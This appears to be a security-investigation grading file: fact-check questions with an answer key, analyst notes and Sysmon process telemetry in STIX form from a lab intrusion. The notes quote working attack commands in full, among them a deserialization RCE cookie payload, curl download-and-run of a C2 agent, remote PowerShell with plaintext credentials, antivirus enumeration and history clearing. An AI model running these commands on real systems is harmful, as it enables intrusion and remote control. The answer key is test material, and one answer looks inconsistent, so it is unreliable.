Created
January 22, 2025 17:14
-
-
Save jt0dd/6bbfaf44852eabfa41b38eff218f65f0 to your computer and use it in GitHub Desktop.
bundle
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "criteria": { | |
| "fact_check_qa": { | |
| "status": "recommended", | |
| "description": "The fact check questions and answers.", | |
| "value": [ | |
| { | |
| "question": "What is the name of the suspicious process?", | |
| "options": [ | |
| "cmd.exe", | |
| "powershell.exe", | |
| "explorer.exe", | |
| "svchost.exe" | |
| ], | |
| "answer_index": 1 | |
| }, | |
| { | |
| "question": "What is the execution policy being used?", | |
| "options": [ | |
| "Default", | |
| "Restricted", | |
| "Bypass", | |
| "Unrestricted" | |
| ], | |
| "answer_index": 2 | |
| }, | |
| { | |
| "question": "Why is this process considered malicious?", | |
| "options": [ | |
| "It is a standard system process.", | |
| "It uses a custom execution policy and reaches out to a known malicious ip.", | |
| "It communicates with a standard web server.", | |
| "The answer is not in the given options." | |
| ], | |
| "answer_index": 3 | |
| } | |
| ] | |
| }, | |
| "disposition": { | |
| "status": "mandatory", | |
| "description": "The disposition of the investigation.", | |
| "value": true | |
| }, | |
| "summary": { | |
| "status": "mandatory", | |
| "value": "Multiple suspicious process executions were detected. These primarily consist of PowerShell processes using '-ExecutionPolicy Bypass', command-line executions via /bin/sh, command execution via cmd.exe, and multiple executions of the Edge browser. These require further investigation to assess potential security risks." | |
| }, | |
| "detailed_analyst_notes": { | |
| "status": "recommended", | |
| "description": "The detailed analyst notes about the observed process.", | |
| "value": "Multiple instances of PowerShell are observed using the '-ExecutionPolicy Bypass' flag. This behaviour is suspicious and is often used by threat actors to run malicious code. Also observed is a bash command that downloads and executes a file from a remote server and an instance of cmd.exe running a batch file from the local temp folder. Additionally, there are multiple instances of Edge being executed with potentially suspicious parameters. These process executions, taken together, strongly suggest a high risk of malicious activity and require urgent investigation.\n- Key elements (Processes)\n - Malicious\n \n powershell.exe -ExecutionPolicy Bypass -C \"$vuln_server = \\\"192.168.56.91\\\";$c2_uri = \\\"http://192.168.56.150:8888\\\";$cmd = \\\"curl -s -X POST -H \\`\\\"file:sandcat.go\\`\\\" -H \\`\\\"platform:linux\\`\\\" $c2_uri/file/download > splunkd;chmod +x splunkd;./splunkd -server $c2_uri -group red -v\\\";$payload = \\\"{\\\"\\\"username\\\"\\\":\\\"\\\"injected\\\"\\\",\\\"\\\"rce\\\"\\\":\\\"\\\"_`$`$ND_FUNC`$`$_function anonymous() {\\nrequire('child_process').exec('$cmd', function(error, stdout, stderr) { console.log(stdout) });\\n}()\\\"\\\"}\\\";$payload_b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload));$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession;$cookie = New-Object System.Net.Cookie(\\\"profile\\\", $payload_b64, \\\"/\\\", $vuln_server);$session.Cookies.Add($cookie);$Response = DNS-Lookup -Uri \\\"http://$vuln_server\\\" -WebSession $session;Write-Output $Response;\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"$username = \\\"user\\\";$password = \\\"redlab\\\";$secstr = New-Object -TypeName System.Security.SecureString;$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;$session = New-PSSession -ComputerName 192.168.56.112 -Credential $cred;Invoke-Command -Session $session -ScriptBlock{cmd.exe /c start C:\\Users\\Public\\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"$r1 = DNS-Lookup https://www.ibm.com/;$r2 = DNS-Lookup https://www.blackhat.com/us-22/;$r3 = DNS-Lookup https://github.com/;$r4 = DNS-Lookup https://european-union.europa.eu/;$r5 = DNS-Lookup https://www.japan.go.jp/;$r1.StatusCode, $r2.StatusCode, $r3.StatusCode, $r4.StatusCode, $r5.StatusCode -join ',';\"\n \n /bin/sh -c curl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" http://192.168.56.150:8888/file/download > splunkd;chmod +x splunkd;./splunkd -server http://192.168.56.150:8888 -group red -v\n \n C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"$job = Start-Job -ScriptBlock { $username = \\\"user\\\"; $password = \\\"redlab\\\"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr; $session = New-PSSession -ComputerName \\\"192.168.56.112\\\" -Credential $cred; $location = \\\"C:\\Users\\Public\\splunkd.exe\\\"; Copy-Item $location -Destination \\\"C:\\Users\\Public\\splunkd.exe\\\" -ToSession $session; Start-Sleep -s 5; Remove-PSSession -Session $session;};Receive-Job -Job $job -Wait;\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\"\n \n \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --js-flags=--ms-user-locale= --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --launch-time-ticks=38478443578 --mojo-platform-channel-handle=5916 --field-trial-handle=2024,i,9782968909270097450,6250304888871396104,131072 /prefetch:1\n \n \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --js-flags=--ms-user-locale= --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --launch-time-ticks=38455853433 --mojo-platform-channel-handle=1884 --field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072 /prefetch:1\n \n ---\n \n - Suspicious\n \n \"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red\n \n /usr/local/src/starx/splunkd -server [http://192.168.56.150:8888](http://192.168.56.150:8888/) -group red -v\n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\n \n powershell.exe -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1\n \n /usr/local/src/starx/splunkd -server http://192.168.56.150:8888 -group red -v\n \n /usr/bin/curl -s -X POST -H file:sandcat.go -H platform:linux http://192.168.56.150:8888/file/download\n \n powershell.exe -ExecutionPolicy Bypass -C ipconfig\n \n powershell.exe -ExecutionPolicy Bypass -C \"Get-WmiObject -Class Win32_UserAccount\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"gpresult /R\"\n \n powershell.exe -ExecutionPolicy Bypass -C whoami\n \n powershell.exe -ExecutionPolicy Bypass -C \"nltest /dsgetdc:$env:USERDOMAIN\"\n \n powershell.exe -ExecutionPolicy Bypass -C get-process\n \n powershell.exe -ExecutionPolicy Bypass -C \"$NameSpace = Get-WmiObject -Namespace \\\"root\\\" -Class \\\"__Namespace\\\" | Select Name | Out-String -Stream | Select-String \\\"SecurityCenter\\\";$SecurityCenter = $NameSpace | Select-Object -First 1;Get-WmiObject -Namespace \\\"root\\$SecurityCenter\\\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\"\n \n powershell.exe -ExecutionPolicy Bypass -C Clear-History;Clear\n \n powershell.exe -ExecutionPolicy Bypass -C \"Get-SmbShare | ConvertTo-Json\"\n \n powershell.exe -ExecutionPolicy Bypass -C \"$owners = @{};gwmi win32_process |%% {$owners[$_.handle] = $_.getowner().user};$ps = get-process | select processname,Id,@{l=\\\"Owner\\\";e={$owners[$_.id.tostring()]}};foreach($p in $ps) { if($p.Owner -eq \\\"user\\\") { $p; }}\"\n \n powershell.exe -ExecutionPolicy Bypass -C $env:username\n \n ---\n \n - Notes\n - Phishing\n - Reconnaissance\n - Discovery\n - Defensive Evasion\n - Execution or Collection\n - Lateral movement\n - C2\nIn an apparent attempt to evade detection, the adversary has created an alias for the Invoke-WebRequest command, renaming it to DNS-Lookup." | |
| } | |
| }, | |
| "bundle": { | |
| "type": "bundle", | |
| "id": "bundle--8554cc7b-081e-48cb-a808-a0960b67915f", | |
| "objects": [ | |
| { | |
| "id": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "identity--e7b86ade-983a-49bb-b22d-86ec3d1318fb", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "identity--df685ac9-4e66-42e6-980e-88078e9ff45f", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "observed-data--52a78cf9-ca58-4411-90b8-116dc75b73b8", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.459Z", | |
| "modified": "2022-07-28T16:04:37.459Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\Explorer.EXE" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-481c-62e1-3e01-000000001400}", | |
| "pe_file_version": "1.0.0.0", | |
| "pe_product": "WpfApp1", | |
| "pe_description": "WpfApp1", | |
| "pe_original_file_name": "WpfApp1.dll", | |
| "pe_company": "WpfApp1", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 1, | |
| "entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "explorer.exe", | |
| "pid": 5708, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\Explorer.EXE" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files\\WinMail\\WinMail.exe\" ", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:20:52.716412638Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:20:46.370Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "explorer.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\Explorer.EXE" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-481c-62e1-3e01-000000001400}", | |
| "pe_file_version": "1.0.0.0", | |
| "pe_product": "WpfApp1", | |
| "pe_description": "WpfApp1", | |
| "pe_original_file_name": "WpfApp1.dll", | |
| "pe_company": "WpfApp1", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 1, | |
| "entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:20:42.075Z", | |
| "last_observed": "2022-07-27T14:20:42.075Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--682fb2a1-daae-4a64-be7e-a13d0bb42855", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.460Z", | |
| "modified": "2022-07-28T16:04:37.460Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\WinMail\\WinMail.exe\" " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:18.681155378Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:12.345Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:06.753Z", | |
| "last_observed": "2022-07-27T14:26:06.753Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0632ffb4-0fd1-4e34-839f-8d5fc21480d2", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.460Z", | |
| "modified": "2022-07-28T16:04:37.460Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\WinMail\\WinMail.exe\" " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "6", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.625374764Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.230Z", | |
| "last_observed": "2022-07-27T14:26:59.230Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--889a40cd-cef9-401e-855a-2078a3d73f4f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.461Z", | |
| "modified": "2022-07-28T16:04:37.461Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\wbem\\wmiprvse.exe", | |
| "-secured", | |
| "-Embedding" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Provider Host", | |
| "pe_original_file_name": "Wmiprvse.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-1966-62e1-f600-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 836 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "WmiPrvSE.exe", | |
| "pid": 2840, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T10:54:38.920268906Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T10:54:32.466Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WmiPrvSE.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "NETWORK SERVICE", | |
| "account_login": "NETWORK SERVICE" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\wbem\\wmiprvse.exe", | |
| "-secured", | |
| "-Embedding" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Provider Host", | |
| "pe_original_file_name": "Wmiprvse.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-1966-62e1-f600-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T10:54:30.945Z", | |
| "last_observed": "2022-07-27T10:54:30.945Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--55fcf42b-477a-4bc6-be62-3fc8f084f98f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.462Z", | |
| "modified": "2022-07-28T16:04:37.462Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "WmiPrvSE.exe", | |
| "pid": 2840, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T10:56:08.590108207Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T10:56:02.270Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-1966-62e1-f600-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "WmiPrvSE.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "NETWORK SERVICE", | |
| "account_login": "NETWORK SERVICE" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T10:56:00.949Z", | |
| "last_observed": "2022-07-27T10:56:00.949Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--66d6ef7f-4e75-4e14-a931-2c99e7b42df4", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--e1711034-8b12-43c2-8229-4eab521d6877", | |
| "created": "2022-07-28T16:04:37.462Z", | |
| "modified": "2022-07-28T16:04:37.462Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:57:06.467515354Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:57:00.129Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
